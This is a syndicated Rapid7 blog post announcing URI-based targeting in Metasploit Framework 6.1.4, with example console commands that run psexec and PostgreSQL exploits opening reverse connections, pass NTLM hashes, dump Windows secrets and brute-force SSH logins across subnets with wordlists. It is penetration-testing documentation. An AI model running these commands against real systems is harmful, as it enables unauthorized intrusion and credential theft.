Easier URI Targeting With Metasploit Framework

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/09/23/metasploit-uri-support/

Easier URI Targeting With Metasploit Framework

Over the past year and a half, Metasploit Framework’s core engineering team in Belfast has made significant improvements to usability, discoverability, and the general quality of life for the global community of Framework users. A few of the enhancements we’ve worked on in MSF 6 include:

  • A handy tip command in msfconsole that delivers tips n’ tricks to users
  • Consolidated EternalBlue modules that removed the need for Python as a dependency, as well as automatic targeting support
  • AutoCheck support, which runs the check functionality of a module before its exploit capabilities are executed to ensure the module will work beforehand, as well as providing a ForceExploit advanced option that allows a user-override this functionality
  • A debug command in msfconsole that provides data to help users understand the root cause of issues
  • Improved cross-platform support for msfdb, as well as supporting external databases — such as using a PostgreSQL Docker container
  • User experience improvements, including word-wrapping tables, highlighting matched search terms in the search table, and introducing context-aware hints — such as letting users know that they can use the use command to easily select a searched module
  • Reducing msfconsole’s boot time, as well as reducing the time required to search for modules, and list exploits/payloads in both the console and module.search RPC calls

Today’s blog looks at another series of improvements that have overhauled Framework’s option support to allow for streamlined workflows when specifying multiple module options for protocols like HTTP, MySQL, PostgreSQL, SMB, SSH, and more. This removes the need to individually call set for each module option value before running it — courtesy of pull request #15253.

Overview

Traditional usage of Metasploit involves loading a module and setting multiple options:

use exploit/linux/postgres/postgres_payload

set username administrator

set password pass

set rhost 192.168.123.6

set rport 5432

set database postgres

set lhost 192.168.123.1

set lport 5000

run

You could also specify multiple RHOSTS separated by spaces, or with a CIDR subnet mask:

set rhosts 127.0.0.1 127.0.0.2

set rhosts 127.0.0.1/24

URI support for RHOSTS

As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:

use exploit/linux/postgres/postgres_payload

run postgres://administrator:[email protected] lhost=192.168.123.1 lport=5000

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit’s console — it will also make it easier to share cheat sheets among pentesters.

SMB examples

There’s a full page of documentation and examples in the Metasploit Wiki, but here are a few highlights that show the improvements.

Running psexec against a target host:

use exploit/windows/smb/psexec

run smb://user:[email protected] lhost=192.168.123.1 lport=5000

run “smb://user:pass with [email protected]” lhost=192.168.123.1 lport=5000

Running psexec with NTLM hashes:

use exploit/windows/smb/psexec

run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] lhost=10.10.14.13 lport=5000

Dumping secrets with NTLM hashes:

use auxiliary/gather/windows_secrets_dump

run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected]

Downloading a file:

use auxiliary/admin/smb/download_file

run smb://a:[email protected]/my_share/helloworld.txt

Uploading a file:

use auxiliary/admin/smb/upload_file

echo “my file” > local_file.txt

run smb://a:[email protected]/my_share/remote_file.txt lpath=./local_file.txt

SSH examples

If you have valid SSH credentials, the ssh_login module will open a Metasploit session for you:

use scanner/ssh/ssh_login

run ssh://user:[email protected]

Brute-force host with known user and password list:

use scanner/ssh/ssh_login

run ssh://[email protected] threads=50 pass_file=./rockyou.txt

Brute-force credentials:

use scanner/ssh/ssh_login

run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt

Brute-force credentials in a subnet:

use scanner/ssh/ssh_login

run cidr:/24:ssh://user:[email protected] threads=50

run cidr:/24:ssh://[email protected] threads=50 pass_file=./rockyou.txt

It’s also now possible to port forward through a Metasploit SSH session:

route add 172.18.103.0/24 ssh_session_id

More examples

Full details and examples can be found within the Metasploit Wiki. At the time of release, the following protocols are now supported:

  • cidr – Can be combined with other protocols to specify address subnet mask
  • length
  • file – Load a series of RHOST values separated by newlines from a file (this file can also include URI strings)
  • http
  • https
  • mysql
  • postgres
  • smb
  • ssh

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.